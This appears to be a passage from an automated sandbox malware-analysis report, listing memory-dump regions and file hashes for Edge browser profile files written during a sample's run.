| SHA256 | e1cf343759bea6643dcfcd5d8b2f1ba8954dfd7565b153f8446927e4961211ef |
| SHA512 | 79aafbb350b79eae4f59361487ee1c5aa0c6360c6429605011ce17f4cbce5a9e5c88be37f1d5e214cb846464d3942b2d083a2ace784a1dc9670eee17f1db0eff |
memory/3956-604-0x00007FF71A0A0000-0x00007FF71A641000-memory.dmp
memory/752-608-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/5584-609-0x0000000000400000-0x0000000000636000-memory.dmp
memory/6028-672-0x00007FF6E4DC0000-0x00007FF6E5361000-memory.dmp
memory/752-673-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/5584-674-0x0000000000400000-0x0000000000636000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 790049b6cabe6d95399be487df0d0de6 |
| SHA1 | c4a39110d0b5b823839419378ddc6f6819c8893d |
| SHA256 | 928e4393e5f90eae9f0e5bec4865459c4a895a96b43390ed79d2eecacb493501 |
| SHA512 | 4c3de667eae6fdb6c10cefd431353a65c80d7a47266a2ffa6f9be6b186a16fa3ae9258b3974fed3810403f59a4e0036868f6f2f60456970d46a49ea3add8737e |
memory/3620-692-0x00007FF6255A0000-0x00007FF625906000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 70f69a71c63d7df5c328363014f26c96 |
| SHA1 | 2ad9bb3c127e87186c6714435888639f12bf0cc5 |
| SHA256 | 664a027b2f676f1cf59f9c8221dd0993afa632ed31fa051541d87f5d37bf5fa7 |
| SHA512 | 18395f9a1cb1b19118f614189ead0e29e6bc2d0dd2a92c2583d9eea6ea4814cd07e1725b5776bfd3d45bf1a23c69c091ee78e0e9e300c66198563100b936e8df |
memory/752-734-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/5584-735-0x0000000000400000-0x0000000000636000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | 7bdcdb7daca381acb8ec29f4c741e524 |
| SHA1 | 7782c01f4e695c657fde8d5500a1b76747d4b1d9 |
| SHA256 | 4a4cad7e1c83e41dd4f82c82422457ae8c45e7ea3446b232a21fc21209c7d806 |
| SHA512 | 40b06e7e7238f3cf5ac8527db5feacbb604afc8347b682dbd813cd260114dcbe71205981299c13faf41dc62f22d01ac322998db30f3c08ef0618bfb4c9d1d645 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | d9ad0ba1ff90ce78a5be289d9d9f1f11 |
| SHA1 | f1449633c8510625b15422c537ee26b7fd73277e |
| SHA256 | 98cfdfc819da251e58095fc44f0a84d9a731f5d69f70b357c1ebd516293bc011 |
| SHA512 | 0a0e171d3b016b4a662ec7b7aea3a545b5fc188de9ebaa06131af645657c79d58a8291d830f8f70b0487a092091031709a7a14511619ed4841a9ee144bf34ee9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 51fc25e26185d02864ba239dc0f07018 |
| SHA1 | 125095b46a292f8d74499b5c7c260d6c859a2c41 |
| SHA256 | 498ee10124918b10e65d2458195372ce7e36bf36ca1ae06ffc0c5f7fa1473bf6 |
| SHA512 | 698b7726d2c431dcaab984fb49dcd787483761ee7105b1d7a8e5db0fc9fb05aa5b707ac966119b222d56fa3a8b764222dca38aeb25734d331bb1b955fbb010d6 |